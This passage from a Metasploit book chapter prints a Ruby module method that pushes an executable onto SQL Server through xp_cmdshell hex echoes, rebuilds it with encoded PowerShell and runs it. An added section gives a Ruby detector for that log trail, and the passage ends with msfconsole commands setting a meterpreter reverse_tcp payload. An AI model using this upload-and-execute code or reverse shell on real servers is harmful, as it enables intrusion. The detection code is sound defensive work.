
Building Your Own Module

195

The following shows the entire mssql.rb file:

#
# Upload and execute a Windows binary through MSSQL queries and Powershell
#
def powershell_upload_exec(exe, debug=false)

  # hex converter
  hex = exe.unpack("H*")[0]
  # create random alpha 8 character names
  #var_bypass  = rand_text_alpha(8)
  var_payload = rand_text_alpha(8)
  print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")

  # our payload converter, grabs a hex file and converts it to binary for us through powershell
  h2b = "$s = gc 'C:\\Windows\\Temp\\#{var_payload}';$s = [string]::Join('', $s);" \
        "$s = $s.Replace('`r',''); $s = $s.Replace('`n','');" \
        "$b = new-object byte[]$($s.Length/2);" \
        "0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};" \
        "[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\#{var_payload}.exe',$b)"

  h2b_unicode=Rex::Text.to_unicode(h2b)
  # base64 encode it, this allows us to perform execution through powershell without registry changes
  h2b_encoded = Rex::Text.encode_base64(h2b_unicode)
  print_status("Uploading the payload #{var_payload}, please be patient...")
  idx = 0
  cnt = 500
  while(idx < hex.length - 1)
    mssql_xpcmdshell("cmd.exe /c echo #{hex[idx,cnt]}>>%TEMP%\\#{var_payload}", false)
    idx += cnt
  end
  print_status("Converting the payload utilizing PowerShell EncodedCommand...")
  mssql_xpcmdshell("powershell -EncodedCommand #{h2b_encoded}", debug)
  mssql_xpcmdshell("cmd.exe /c del %TEMP%\\#{var_payload}", debug)
  print_status("Executing the payload...")
  mssql_xpcmdshell("%TEMP%\\#{var_payload}.exe", false, {:timeout => 1})
  print_status("Be sure to cleanup #{var_payload}.exe...")
end
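The method above leaves a very recognisable trail on the database host: hundreds of xp_cmdshell calls that each echo a hex chunk into a file under %TEMP%, followed by a single `powershell -EncodedCommand` whose script turns that hex back into bytes and writes an executable. The example below is added here and is not from the book or the Metasploit project; it works the same encoding in reverse from the detecting side. It recreates the -EncodedCommand encoding (base64 of the UTF-16LE script, which is what Rex::Text.to_unicode plus Rex::Text.encode_base64 produce) so that a logged command line can be decoded, then scans a constructed set of xp_cmdshell command lines for the two traces. The function names, the indicator patterns, the random file name and the log lines are all constructed for this example, and the input format (one bare command line per entry, as SQL Server Audit or process-creation logging would record it) is an assumption.

```ruby
require 'base64'

# Added example (not from the book or the Metasploit project): decode and flag
# the traces the upload method above leaves in xp_cmdshell / process logs.

# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script bytes, which
# is what Rex::Text.to_unicode followed by Rex::Text.encode_base64 produce.
def encode_powershell_command(script)
  Base64.strict_encode64(script.encode('UTF-16LE').b)
end

# Recover the script from a logged command line; nil if no encoded command is
# present or the payload does not decode as UTF-16LE.
def decode_encoded_command(cmdline)
  m = cmdline.match(/-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+\/=]+)/i)
  return nil unless m
  Base64.decode64(m[1]).force_encoding('UTF-16LE').encode('UTF-8')
rescue EncodingError
  nil
end

# Content of the decoded script that marks the hex-to-binary dropper pattern
# (patterns constructed for this example).
SCRIPT_INDICATORS = {
  hex_to_bytes: /\[Convert\]::ToByte\(.*?,\s*16\)/i,
  write_binary: /\[IO\.File\]::WriteAllBytes/i,
  temp_drop:    /Windows\\Temp|%TEMP%/i,
}.freeze

# One echo of a long hex run appended to a file under %TEMP%: the chunked
# upload loop above produces hundreds of these from a single connection.
HEX_APPEND = /\becho\s+[0-9a-f]{16,}\s*>>\s*%TEMP%\\/i

# Return a list of human-readable findings for a batch of command lines.
def analyze_xp_cmdshell_log(lines)
  findings = []
  chunks = lines.count { |l| l =~ HEX_APPEND }
  findings << "#{chunks} hex chunks appended to a %TEMP% file via echo" if chunks > 0
  lines.each do |l|
    script = decode_encoded_command(l)
    next unless script
    hits = SCRIPT_INDICATORS.select { |_, rx| script =~ rx }.keys
    findings << "encoded PowerShell matching #{hits.join(', ')}" unless hits.empty?
  end
  findings
end

# Constructed sample: the command lines an audit of xp_cmdshell would record
# for the upload method (the file name and hex bytes are made up here).
SAMPLE_SCRIPT = "$s = gc 'C:\\Windows\\Temp\\AbCdEfGh';$s = [string]::Join('', $s);" \
                "$b = new-object byte[]$($s.Length/2);" \
                "0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};" \
                "[IO.File]::WriteAllBytes('C:\\Windows\\Temp\\AbCdEfGh.exe',$b)"

SAMPLE_LOG = [
  "cmd.exe /c echo 4d5a90000300000004000000ffff0000>>%TEMP%\\AbCdEfGh",
  "cmd.exe /c echo b800000000000000400000000000000000>>%TEMP%\\AbCdEfGh",
  "powershell -EncodedCommand #{encode_powershell_command(SAMPLE_SCRIPT)}",
  "cmd.exe /c del %TEMP%\\AbCdEfGh",
  "%TEMP%\\AbCdEfGh.exe",
  "dir C:\\",
].freeze

if __FILE__ == $PROGRAM_NAME
  analyze_xp_cmdshell_log(SAMPLE_LOG).each { |f| puts "[!] #{f}" }
end
```

Run directly, the script prints the two findings for the constructed log. In practice the input would come from SQL Server Audit events for xp_cmdshell or from process-creation logging on the database host, and a threshold on the echo-append count per login and time window separates this chunked-upload pattern from a single administrative use of xp_cmdshell.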

Running the Exploit

With our work on mssql_powershell.rb and mssql.rb complete, we can run the exploit through Metasploit and msfconsole. But before we do, we need to make sure that PowerShell is installed. Then we can run the following commands to execute our newly created exploit:

msf > use windows/mssql/mssql_powershell
msf exploit(mssql_powershell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_powershell) > set LHOST 172.16.32.129
LHOST => 172.16.32.129
msf exploit(mssql_powershell) > set RHOST 172.16.32.136